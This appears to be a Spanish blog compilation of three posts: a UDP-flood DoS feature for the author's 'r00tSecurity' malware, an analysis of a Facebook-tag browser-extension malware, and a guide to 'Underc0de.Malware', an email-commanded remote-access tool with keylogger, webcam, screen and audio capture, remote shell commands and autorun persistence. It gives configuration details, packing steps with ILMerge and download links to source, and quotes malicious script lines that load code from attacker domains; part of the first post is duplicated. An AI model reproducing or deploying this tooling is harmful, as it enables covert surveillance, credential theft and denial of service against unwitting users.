UDP Flood desde un malware de Open Source(r00tSecurity.exe)

Agregando mas funciones a nuestro “malware” r00t security, En este caso tomamos en cuenta a un factor dentro de la seguridad denominado negación de servicio (denial of services), uno de los más usados en la actualidad que también constituye parte de las etapas de un Ataque (“pentesting”) y que cada vez que escucho o leo el algún artículo se me viene a la mente “MafiaBoy” uno de los grandes ataques usando este método.



En qué consiste el Dos cada vez que uno accede a un sitio web envía cierta cantidad de paquetes de datos en los cueles se incluye información que será devuelta por el servidor, esa cantidad suele ser mínima de esa manera no afecta al redimiendo del host a quien va dirigido la consulta, pero en este caso si llegáramos a enviar grandes paquetes para saturarlo además de utilizar no solo un ordenador si múltiples en este caso sería una distribución de negación de servicio conocido como “DDOS” y de esa manera alertaríamos el tiempo de respuesta que suele ser ms “milésimas de segundo”.

Hay muchos tipos de ataque usando flood, en este caso solo tome el concepto de uno de ellos llamado UPD Flood.

El UDP es un protocolo que corresponde a la capa de transporte juntamente con el TCP, DCCP … en Esta se incluye a 2 componente el destinatario y el destino. El UDP utiliza los datagramas o bloques de información que contiene la información necesaria haciendo que la red solo lo dirija hacia su destino peor en este caso hablando ya de UDP no necesita establecer conexión con el destinatario para el envió de datagramas ya que en la cabecera del paquete se encuentra la información necesaria para encontrar su destino. Y por consiguiente tampoco se tiene confirmación si se llego con excito o no el paquete.

Agregando mas funciones a nuestro “malware” r00t security, En este caso tomamos en cuenta a un factor dentro de la seguridad denominado negación de servicio (denial of services), uno de los más usados en la actualidad que también constituye parte de las etapas de un Ataque (“Pentestig”) y que cada vez que escucho o leo el algún artículo se me viene a la mente “MafiaBoy” uno de los grandes ataques usando este método.
En qué consiste el Dos cada vez que uno accede a un sitio web envía cierta cantidad de paquetes de datos en los cueles se incluye información que será devuelta por el servidor, esa cantidad suele ser mínima de esa manera no afecta al redimiendo del host a quien va dirigido la consulta, pero en este caso si llegáramos a enviar grandes paquetes para saturarlo además de utilizar no solo un ordenador si múltiples en este caso sería una distribución de negación de servicio conocido como “DDOS” y de esa manera alertaríamos el tiempo de respuesta que suele ser ms “milésimas de segundo”.
Hay muchos tipos de ataque usando flood, en este caso solo tome el concepto de uno de ellos llamado UPD Flood.

El UDP es un protocolo que corresponde a la capa de transporte juntamente con el TCP, DCCP … en Esta se incluye a 2 componente el destinatario y el destino. El UDP utiliza los datagramas o bloques de información que contiene la información necesaria haciendo que la red solo lo dirija hacia su destino peor en este caso hablando ya de UDP no necesita establecer conexión con el destinatario para el envió de datagramas ya que en la cabecera del paquete se encuentra la información necesaria para encontrar su destino. Y por consiguiente tampoco se tiene confirmación si se llego con excito o no el paquete.

UPD Flood: Es inundar con grandes cantidades de paquetes UDP enviados a host llegando a un puerto aleatorio o ya establecido. Cuando el datagrama llega a su destino el apquete ira akl pa que aplicación será dirigida, pero cuando no se encuentra que dicha aplicación que se encuentra en dicho puerto no requiere dicho paquete se generara el conocido Internet Control Message Protocol (notificación de errores) como por ejemplo cuando un host no esta disponible. Cuando se llegan enviar múltiples paquetes podemos hacer que el sistema deje de funcionar.
Para proteger de este tipo de ataques se puede utilizar un firewall o las diferentes tecnologías como IPS(Intrusion prevention system ), filtrar los paquetes UDP y sobre todo monitorear la red y sus servicios.
Con un poco de teoría pasamos a ver como funciona:

Se envia con los parámetros necesarios:

IP: direcion ip
PORT: puerto
PACK: tamaño del paquete
SOCK:Repeticion se incluira en un for previamente en el codigo

Envio de parámetros

http://www.vermiip.es/puertos/
http://www.t1shopper.com/tools/port-scan/
o tambien puedes usar el famoso "namp"

un previo Testeo:

 

UDP Testeo

VER: http://www.r00t-security.com/un-malware-de-open-source/

Link Código Fuente: https://www.dropbox.com/s/jtutewf9rltel2i/r00t%20Security%201.5.zip

Link del Decryter https://www.dropbox.com/s/khxxhvlkavsdspg/RootSecurityDecryptedEXE.zip

Link de ILMerge http://www.microsoft.com/en-us/download/details.aspx?id=17630

Link de myIp.php https://www.dropbox.com/s/4o6gsl9rcbs8bmn/myIp.zip

*****************************************
*****************README******************
*****************************************

r00tSecurity.exe es un proyecto de Open Source (GPL) con el fin de enseñar y promover la conciencia a los internautas sobre la problemática que ocurren cuando un malware infecta a los ordenadores. No me responsabilizo de cualquier uso malintencionado que se haga del proyecto, así como de las modificaciones que los usuarios puedan realizar al código fuente de las aplicación,tampoco me hago responsable de las copias del proyecto que sean distribuidas a través de otras website o usuarios y que puedan haber sido modificadas con intenciones dudosas.

Malware se propaga mediante "etiquetas" en Facebook

 

Malware

El celular no deja de sonar por las múltiples notificaciones que recibía y todas eran la por las etiquetas que recibía mi cuenta de Facebook, joooder y todas tenían una dirección algo extraña. www.ناماراتاماراتامارات.امارات y según google es Persa… que rara dirección. Así que agarre el ordenador y me puse a averiguar porque me daba mala espina. Vi la dirección de la redirección y era esta www.xn--mgbaaaaaaaaydd5fee22afff.xn--mgbaam7a8h WDF…!! Pero seguí mas adelante tome la dirección www.sosyalpaket.net al parecer la primera dirección era el camuflaje aquella te envía a otra página según el navegador que tengas. Con el Siguiente código:

<?php
var is_opera=navigator.userAgent.toLowerCase().indexOf("opera")>-1;
var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
var is_safari=navigator.userAgent.toLowerCase().indexOf("safari")>-1;
var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
if(is_chrome){inst="http://www.sosyalpaket.net/chrome.php"}
else
if(is_firefox){inst="http://www.sosyalpaket.net/firefox.php"}
else
if(is_opera){inst="http://www.sosyalpaket.net/chrome.php"}
else
{var inst="http://www.sosyalpaket.net/chrome.php"}
?>

Lo que te envía es a descargar un complemento según el navegador que tengas, en este caso lo teste con firefox y me envió a descargar un complemento.

Con el siguiente mensaje:

Por favor, botón Actualizar Firefox Actualice.
Debido a los errores del sistema y vulnerabilidades de seguridad que se requieren pulsando el botón Recargar
Instalar el plug-in de Firefox Update.
Siempre y cuando usted no ha actualizado las características del sitio faydalanamayacaksınız.

Mensaje

Lo que me dio risa fue ese mensaje de “Debido a los errores del sistema y vulnerabilidades de seguridad” jajajaja le seguiremos la corriente una vez descargado abrimos el complemento con winrar pero antes lo escaneamos para ver si este malware ya fue reportado.

https://www.virustotal.com/es/file/8c3f282af8c718b69bcd142adfed63fc1dfde3b08a3677972dd08bf2a787604f/analysis/

y el resultado fue 6 / 45 así que por el momento no todos los antimalware lo reconocen. Ya que lo tenía abierto empecé a entender las líneas de códigos.

 

File

Y encontré algo que me resulto familiar

if(location.hostname.indexOf("facebook.com") >= 0){
addJavascript('http://sosyalpaket.net/yeni.php');
addJavascript('http://fbmedyahizmetleri.com/bakgel.php');
addJavascript('http://facebookhizmetlerim.com/user.php');
}

En el user.php me tope con:

<?php
https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
?>

Es por ese medio por el cual se propaga y si llegas a descargar por que eres de aquellas personas que le da click a todo button que ve solo basta con dirigirte a tu navegador al apartado extensión o complemento según sea el caso y verificar una similar a ello.

Complemento

Si es que contienen, lo más razonable es eliminarlo.

Un Malware de Open Source

Este artículo lo tenía guardado y por falta de tiempo no lo di a conocer, hace una par de semanas para ser exactos creo que fueron 2 publique un artículo que se tratada sobre un “Mouselogger” (denominado así pues capturada los click en determinados procesos), pero esta vez les traigo algo un poco más complejo bueno por así decirlo este. A comparación del lo publicado hace semanas este no captura las coordenadas de los click que se realizan si no por otro lado captura el imágenes de la webcam, grabaciones, envió de código a la terminal y por su puesto el infaltable log del teclado. Eso está incluido en la versión alfa pues puede llegar a salir a la luz los infaltables errores. Pero por el momento es todo ello lo que nos puede ofrecer la pequeña aplicación que es este caso lleva el nombre de “Underc0de.Malware”.

Una Captura del Solution Explorer:

 

Solution Explorer

Cada proceso que a realizar se encuentra en una carpeta especifica, para así de esa manera tener más orden. Empecemos a explicar un poco el código y como se ejecuta:

Move_Exe_Ejecutarse.MoverExe()
Autorun.Autorun()
BuscarDispositivos()
CreateCarpeta.Carpeta()
Systeminfo.DatumPc()
Intervalo_Pop.Timeejecutar(Intervalo_Pop.tiempototal)

1.- Como se ve el primero en ejecutar es la creación de la carpeta pues será esa el nido de nuestro malware

2.- Lo siguiente será mover nuestro exe a dicho carpeta creada

3.- Se ejecutara el autorun

4.- Busca un dispositivo de CamWeb

5.- Realiza ya comprobación para conocer la IP pública, IP privada y el nombre de la PC.

6.- Se ejecuta el intervalo de comprobación POP

Hay un Módulo

Config_General

en el cual se encuentra parámetros como el Email, ubicación de Carpetas, tiempo de verificación de POP, Webcam, Log del teclado, Rec Audio,Capture Pantalla y el Terminal. Si se decide cambiar parámetros es en ese modulo donde se debe reemplazar con el valor que usted desea.

Config_General

Si llega un mensaje del destinatario al que se enviara el mensaje:

Public Config_Para As String = "underc0de@outlook.com"

NOTA: El mensaje que se envía debe ser el mismo al que se enviara el mensaje. Para así otras personas que envían el parametro de un correo diferente el programa los desconosca.

Esto son las variables que reconoce el programa cuando se envía

Dim ComanPantalla As String = "Pantalla"
Dim ComanWebcam As String = "WebCam"
Dim RecAudio As String = "RecAudio"
Dim Terminal As String = "Terminal"
Dim Keylogger As String = "Keylogger"

Estos variables deben estar en el Asunto

Pantalla

Eso sucederá para Captura de Pantalla, Webcam y Keylogger. Pero a diferencia del Terminal(que lo denomine así al Consola de Windows) en Asunto sería diferente.

Terminal ipconfig:/all
La forma de escribirlo en la consola de Win seria: ipconfig /all , el espacio lo he reemplazado por los “:” dos puntos, pero si solo se quiere enviar un consulta sin argumento sería de la siguiente manera:

Syteminfo

En este caso después de los dos puntos se encontrara vacio. Pero se debe colocar necesariamente los “:” sin espacio alguno al final.

Mientras para RECAUDIO el intervalo que tu coloques:

#Region "Tiempo Verificacion POP"
Public Tiempo_Verificacion_POP As Integer = 6 
'intervalo de 6 minutos para la consulta POP
#End Region

no debe ser mayor al numero de grabación ( en la siguiente version lo solucionare), para la grabación debe ser de la siguiente manera:

RecAudio 1

"1" es el tiempo de grabación si deseamos que grabe 2 minutos pero sin llegar a serl el valor de la consulta pop, seria: RecAudio 2 (esto debe ir en asunto)

Ya que el programa necesitas dll para el POP y la WebCam.

 

 dll

Tenemos que fusionarlos (unirlos con el exe) para así tengamos solo un archivo. Para ello será necesario de una tools muy buena ILMerge.

1.- Llevamos a una carpeta los 3 dll mas el exe y un el archivo bat (el cual dejare el link).

ILMerge

2.- Luego vamos a la consola y nos vamos a la ubicación de la carpeta, colocamos lo siguiente.

 

Fusion Fusion cmd2

Seguido nos mostrara el archivo unido.

*.exe

El archivo bat

bat

ILMerge.exe /target:Winexe /out:underC0de2.exe underc0de.exe OpenPop.dll AForge.Video.DirectShow.dll AForge.Video.dll

Link de Codigo Fuente Underc0de.malware.exe :https://www.dropbox.com/s/8wce6hqxxoqkxr2/Underc0de.zip

Link del Decryter https://www.dropbox.com/s/khxxhvlkavsdspg/RootSecurityDecryptedEXE.zip

Link de ILMerge http://www.microsoft.com/en-us/download/details.aspx?id=17630

Link de myIp.php https://www.dropbox.com/s/4o6gsl9rcbs8bmn/myIp.zip

'*****************************************'*****************README******************'*****************************************

Underc0de.exe es un proyecto de Open Source (GPL) con el fin de enseñar y promover la conciencia a los internautas sobre la problemática que curren cuando un malware infecta a los ordenadores. No me responsabilizo de cualquier uso malintencionado que se haga del proyecto, así como de las modificaciones que los usuarios puedan realizar al código fuente de las aplicación, tampoco me hago responsable de las copias del proyecto que sean distribuidas a través de otras website o usuarios y que puedan haber sido modificadas con intenciones dudosas.

Ya que se enceuntra en la version alfa podria tener algunos errores. Pero por el momento lo he testeado en Win7 y XP (corre de maravilla).